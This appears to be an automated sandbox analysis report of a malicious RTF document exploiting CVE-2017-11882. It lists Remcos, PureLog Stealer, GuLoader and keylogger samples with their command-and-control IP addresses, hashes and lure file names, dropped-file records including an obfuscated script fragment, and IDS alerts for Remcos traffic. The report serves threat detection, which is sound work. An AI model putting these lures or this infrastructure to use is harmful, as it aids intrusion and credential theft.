INTERNET-ARCHIVEUS | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
ATOM86-ASATOM86NL | 6122.scr.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 6122.scr.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | file.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
AS-COLOCROSSINGUS | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 104.168.32.148
AS-COLOCROSSINGUS | DHL Receipt_AWB811070484778.xls | malicious | Unknown | 192.3.220.20
AS-COLOCROSSINGUS | DHL Receipt_AWB811070484778.xls | malicious | Unknown | 192.3.220.20
AS-COLOCROSSINGUS | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | BL.xls | malicious | Remcos, PureLog Stealer | 104.168.32.148
AS-COLOCROSSINGUS | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 192.210.150.29
AS-COLOCROSSINGUS | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 192.3.146.145
AS-COLOCROSSINGUS | K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 107.175.243.142
AS-COLOCROSSINGUS | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 107.175.113.252
AS-COLOCROSSINGUS | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 107.173.4.16

Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
05af1f5ca1b87cc9cc9b25185115607d | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
                        No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4760
Entropy (8bit): 4.834060479684549
Encrypted: false
SSDEEP: 96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5: 838C1F472806CF4BA2A9EC49C27C2847
SHA1: D1C63579585C4740956B099697C74AD3E7C89751
SHA-256: 40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512: E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious: false
Preview: PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 242204
Entropy (8bit): 3.7503849148647648
Encrypted: false
SSDEEP: 3072:e6OFbCm2KNCDW+SIVq7+r7Gqrgt5pHGw/Wn8Sbgt86sRzkZNCQ7/EhPVFf0NCWl7:eQmY8IVr7GLWIF4zSbEhXOCWlIVpWB
MD5: 23E413B982049B148C538D6CB7D3806D
SHA1: 1A2242865CA56FC82CA987811E0BC6407A272B27
SHA-256: 2004D59D558983F5D19B914B2B348F75443C81B6F2CF0C76F7735037D376CED1
SHA-512: 6C8B319159EF4E20E19E3BAAA7357927F0D3E4C60AC2C4CAD0AFCAED04175A595CE0C417ED4556215B049841274F3B4BE67BD4E8B6D10F53C5E2FEB5304A6913
Malicious: false
Preview: ..a.L.T.C.K.n.o.H.n.c.C.f.Z.T.d.d.o.i.J.c.P.P.c. .=. .".C.z.W.k.G.A.L.j.W.P.a.K.c.P.c.J.R.v.u.h.W.c.Z.".....u.c.G.c.e.Q.N.c.K.Z.j.c.L.Q.I.W.I.I.f.B.N.o.L. .=. .".P.I.o.K.W.z.j.f.W.A.b.W.G.o.q.K.N.h.A.W.L.L.B.".....a.o.Z.a.G.b.s.L.x.n.K.K.p.G.U.S.I.c.L.p.P.r.U. .=. .".Z.u.W.K.x.G.n.p.n.H.G.R.L.i.c.W.C.q.o.U.k.k.h.".....r.O.U.U.A.m.e.A.i.a.Z.a.p.C.G.G.p.T.W.G.K.L.W. .=. .".i.K.g.i.c.K.C.p.e.q.h.K.T.k.W.o.L.N.G.L.H.k.a.".....n.l.O.G.l.c.L.S.W.W.O.W.o.k.L.k.W.J.c.s.e.L.U. .=. .".W.K.c.c.L.U.K.W.o.c.j.f.O.K.a.L.p.Q.U.C.R.O.N.".....o.H.L.W.O.i.b.m.h.Z.s.z.R.B.K.L.U.i.L.c.W.i.J. .=. .".T.z.L.p.f.p.h.B.b.c.l.H.L.j.l.q.L.x.W.Z.b.P.z.".....W.s.d.U.L.z.p.p.W.L.K.k.G.L.G.x.W.L.z.u.h.i.a. .=. .".i.U.j.i.m.f.m.p.h.L.b.Q.N.g.C.e.K.N.k.b.W.v.A.".....K.s.W.a.m.h.K.z.p.k.b.i.f.W.W.o.K.W.b.d.W.x.z. .=. .".I.t.B.K.L.x.S.k.j.d.J.P.m.e.u.i.Z.R.L.G.W.u.h.".....i.d.l.r.l.z.U.m.G.C.U.o.z.b.i.o.c.z.P.L.m.k.N. .=. .".Z.G.c.c.G.f.h.e.Z.i.l.U.k.v.A.a.c.e.r.n.a.d.a.a.e.c.k.K.".....U.i.L.L.A.q.z.a.U.G.c.L.f.z.l.U.s.

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: CE338FE6899778AACFC28414F2D9498B
SHA1: 897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256: 4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512: 6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious: false
Preview: (16384 identical non-printable bytes, consistent with the 0.0 entropy; the report renders them as dots)

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 12288
Entropy (8bit): 3.567844627766266
Encrypted: false
SSDEEP: 192:KPvOZhz3Py+Lg0YcKJ+qhuiVnmdULwf/xSqgVvtiMQrTC5PYgWpHOe8yLqDE:KuZhzXgjJbuiVm0ibHCOgsHZJLeE
MD5: E03A7F0C6E83FCBC9A98CA3E4D4847E2
SHA1: F08C26EAF174A0234FE6C521D87695131B9B1A5E
SHA-256: 3CC89A9EF677DB2CC8262DD1CDB4BE48024D5AF3D60A5838AEF6830E4FDA5D7A
SHA-512: A197D4A7DBE96D4A32259A21E5CEA10D300388A670AB382F7512C3EA98C8C9137ECEB2885944CFD66B74751A446035AE8283B1692465F22A6AFD9D6D27ECD73C
Malicious: false
Preview: 5.4.8.2.5.7.3.0.6.[.4.>.?.=.2.....?.2.3...8...%.5.4.).>././.9.0.|.@.%...4.8.4.?.,.2.%.].)...?.?.?._.+.#.'...2.,.;.[...!.8.>.>.#...%.1.4.`.$.0.>.=.].^.`.?.$.*.%.8.>.7.?.?.+.#.....&...^...<.$.=.%._.,...*.;.?.5.3...2.$.`.!.0.%.#...!.8.0.=.^.^.?.1.1._.@.@.(.^...@.`.%.%.$.3.[.!...`.).&.9...&.:.?.7...?.>.(.?.].%.>.4.'.(.&.5.?./.5.3...;.].3...;.@./.`.+...5.%._.,.[.8.^.&.?.>.8.0.>.3.[.^.5.2.>.#.8.%.7...(.|...:.~.6.3.$.(.:.?.?.&.(.0.4.3...#...?.;.....[.*.0.>._.9.,...).].,.$...<.<.|._.>.&.@.`.).;.&.$.|.?.).;.=.&.].7.?.?.,._.^.4.|.!.?.8./.].^.).^.+.,.5.....!.+.&.).....1...+...?.1.6.9.~.'.&.`.4.0.?.'.[.'.$...*.0.0.[.).].3.?.8.=.].,.&.?.+.#.(.?.`.?.7.4.;.].?.'.^.].*.;.#.@.3.<.'.2.7.>.|.`.|.`.?.,.,.2.;.].4.>.-.^.-.,.].@.;.!./.6.*.>.,.:.~.:.%.<.].).;.+...?.$.2.?.*...^.%.!.`.~.=.4.`.)...3.?.'.+.,.%.7.:./.6.=.@.+.@.~.2.0.!.#.].+.3.?.].^.=.).,.-.=.=.&.|./.~.#.~.6.^.:.'...#.3.-.%.%.@.*.4.?.'./.5.=.?.3.&.4.@.$.(.!.8.'.;.'.%.3.?.:...<.#.?.?.?.3.).6.?.)...-.5.#.?.0.7.9.)./.)._.|.7./.&.;...>.6.:.@./.].-.?.@.

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Preview: (1024 non-printable bytes; the report renders them as dots)
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1392529298687848
                        Encrypted:false
                        SSDEEP:24576:TO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:TOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:C91EC8C784D828617FEB38B07575505A
                        SHA1:DD307115CBF128028F1BBEDBF473761B2A00761A
                        SHA-256:4B61AB3D23FAC5261E83C18A9ACCA1AFB5E50FF5E5FB04E0C91A38084A8F5620
                        SHA-512:9328B0E900082C1B8316B9C41ADD4FABF714088EE3424289640B5E1947D1E5492B9D3E9DE59AA40D3A874E2F454770ADEE8F4880B9937EBF1E3EB2C157751ABA
                        Malicious:false
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1390575415766635
                        Encrypted:false
                        SSDEEP:24576:QO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:QOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:3066E41B964B2F764A88A47A3C93F8E0
                        SHA1:78C6D7363694B23F49DBAA08F163A0A1557668F1
                        SHA-256:58045B75060FF67DEC99471B310283A64A10E50552CECBDB6B20273F48D68AB0
                        SHA-512:935C7089E5D6D09B2AFCD4F0B8E33F998186680DAE85A140F1B7051CB2C2535F759B1EBBC0DAA0472B949AE3574064EA226D2AE57EF3080BE2CA62F3EEC52245
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Thu Sep 26 07:32:58 2024, length=93195, window=hide
                        Category:dropped
                        Size (bytes):1239
                        Entropy (8bit):4.5374974454458945
                        Encrypted:false
                        SSDEEP:24:8u6/XToSQt42HCdOSQ5JemElTHCdOSQ/Dv3qmr57u:8u6/XT8vHCc4HC7u9u
                        MD5:4B04A3FDC971AB9EDF2A39965A8443C7
                        SHA1:D85E2A09A022D654A7C0F567F58687856ACFAFF5
                        SHA-256:0E2F6569EDCD5AB1746921ACC2E191E17FFD57520A5DB6980D96ED2284CF6F7E
                        SHA-512:3D868625A5F1CCBA8A5E503541981F22121C8159B9FF83AC921E6DF1E76B9E97667F16E10FF47E32EBCADF4A2EAD51453979A3B6E55FE8CABCB89112F70582A0
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [folders]
                        Category:dropped
                        Size (bytes):145
                        Entropy (8bit):4.982424823001407
                        Encrypted:false
                        SSDEEP:3:H9rbcK+JiMWUmUcKm4P8bcK+JiMWUmUcKv:H9rwKNX3UwwKNX3Uj
                        MD5:33551BF8D0B74BD7D8C697A8B25E369F
                        SHA1:515882BF9CCBD85319126A3B1246F6F86BCE04F1
                        SHA-256:C539F861B66300B191DE750996793865031CF595199520F9FBF535A47E66E62A
                        SHA-512:261FC4501D9CC8C6E825AB2454CB062C4C25E1A725B38DD10FDAC20E433CDA1F88B6E17982D06AF33335CC67E85402BCE2D12B43EB01DCE4DBFA19ACB8DF6C75
                        Malicious:false
                        Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK=0..
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                        MD5:EB62D355909FD3DD98A808A4D456667D
                        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                        Malicious:false
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):242204
                        Entropy (8bit):3.7503849148647648
                        Encrypted:false
                        SSDEEP:3072:e6OFbCm2KNCDW+SIVq7+r7Gqrgt5pHGw/Wn8Sbgt86sRzkZNCQ7/EhPVFf0NCWl7:eQmY8IVr7GLWIF4zSbEhXOCWlIVpWB
                        MD5:23E413B982049B148C538D6CB7D3806D
                        SHA1:1A2242865CA56FC82CA987811E0BC6407A272B27
                        SHA-256:2004D59D558983F5D19B914B2B348F75443C81B6F2CF0C76F7735037D376CED1
                        SHA-512:6C8B319159EF4E20E19E3BAAA7357927F0D3E4C60AC2C4CAD0AFCAED04175A595CE0C417ED4556215B049841274F3B4BE67BD4E8B6D10F53C5E2FEB5304A6913
                        Malicious:true
                        Preview:..a.L.T.C.K.n.o.H.n.c.C.f.Z.T.d.d.o.i.J.c.P.P.c. .=. .".C.z.W.k.G.A.L.j.W.P.a.K.c.P.c.J.R.v.u.h.W.c.Z.".....u.c.G.c.e.Q.N.c.K.Z.j.c.L.Q.I.W.I.I.f.B.N.o.L. .=. .".P.I.o.K.W.z.j.f.W.A.b.W.G.o.q.K.N.h.A.W.L.L.B.".....a.o.Z.a.G.b.s.L.x.n.K.K.p.G.U.S.I.c.L.p.P.r.U. .=. .".Z.u.W.K.x.G.n.p.n.H.G.R.L.i.c.W.C.q.o.U.k.k.h.".....r.O.U.U.A.m.e.A.i.a.Z.a.p.C.G.G.p.T.W.G.K.L.W. .=. .".i.K.g.i.c.K.C.p.e.q.h.K.T.k.W.o.L.N.G.L.H.k.a.".....n.l.O.G.l.c.L.S.W.W.O.W.o.k.L.k.W.J.c.s.e.L.U. .=. .".W.K.c.c.L.U.K.W.o.c.j.f.O.K.a.L.p.Q.U.C.R.O.N.".....o.H.L.W.O.i.b.m.h.Z.s.z.R.B.K.L.U.i.L.c.W.i.J. .=. .".T.z.L.p.f.p.h.B.b.c.l.H.L.j.l.q.L.x.W.Z.b.P.z.".....W.s.d.U.L.z.p.p.W.L.K.k.G.L.G.x.W.L.z.u.h.i.a. .=. .".i.U.j.i.m.f.m.p.h.L.b.Q.N.g.C.e.K.N.k.b.W.v.A.".....K.s.W.a.m.h.K.z.p.k.b.i.f.W.W.o.K.W.b.d.W.x.z. .=. .".I.t.B.K.L.x.S.k.j.d.J.P.m.e.u.i.Z.R.L.G.W.u.h.".....i.d.l.r.l.z.U.m.G.C.U.o.z.b.i.o.c.z.P.L.m.k.N. .=. .".Z.G.c.c.G.f.h.e.Z.i.l.U.k.v.A.a.c.e.r.n.a.d.a.a.e.c.k.K.".....U.i.L.L.A.q.z.a.U.G.c.L.f.z.l.U.s.
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                        MD5:EB62D355909FD3DD98A808A4D456667D
                        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                        Malicious:false
                        File type:Rich Text Format data, version 1
                        Entropy (8bit):2.774175252993005
                        TrID:
                        • Rich Text Format (5005/1) 55.56%
                        • Rich Text Format (4004/1) 44.44%
                        File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
                        File size:93'195 bytes
                        MD5:9cb9142659aa46876659d869b522a616
                        SHA1:7704e37a8ec272ec3a8f24c2f56e8e0c0071a7fe
                        SHA256:d9c48d17fccf4c215621206bf43697a8e56120e21a6fe8669ec36a5be8e05a43
                        SHA512:438c3ee43f354ab3254b68354e3d2da1b7f736ec1104c4524d2d4a742c7de9762e47e759fae08c0c953026157a1b85f2610ebc57bb6065a727c044c67c9c6c44
                        SSDEEP:384:NLrP/UV6hlG7DGtLglDG93sdXUWdMBXF5iPFXX1ANp5d1k/L:90V6PGT0mUWab5iVX1Op5d2L
                        TLSH:B593BD9C874F44A5CB455337132A5E4506FDB33EB30551B639ACA7B037AE82E09A50BC
                        File Content Preview:{\rtf1..{\*\J7dtfvmz1CHtSfgPsmYXYi4D5mCAUvpEedNjtxXCwpGKyg1C6IOhynlFf3LimDTiwa6vKeYtcQay62cS9aE9j8yyO8MvMv9NxcoNEALVpdIiAs0boH4p6sEo2eHhUBNbTOXzteSQN8QUR}..{\3548257306[4>?=2..?23.8.%54)>//90|@%.484?,2%]).???_+#'.2,;[.!8>>#.%14`$0>=]^`?$*%8>7??+#..&.^.<$=
                        Icon Hash:2764a3aaaeb7bdbf
                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                        00000169Chno
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T10:33:12.763912+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 185.29.10.52 | 80 | 192.168.2.22 | 49163 | TCP
2024-09-26T10:33:12.763912+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 185.29.10.52 | 80 | 192.168.2.22 | 49163 | TCP
2024-09-26T10:33:16.344510+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49164 | 192.210.150.29 | 14645 | TCP
2024-09-26T10:33:18.064584+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49165 | 192.210.150.29 | 14645 | TCP
2024-09-26T10:33:18.153483+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49166 | 178.237.33.50 | 80 | TCP
2024-09-26T10:35:10.442136+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49167 | 192.210.150.29 | 14645 | TCP
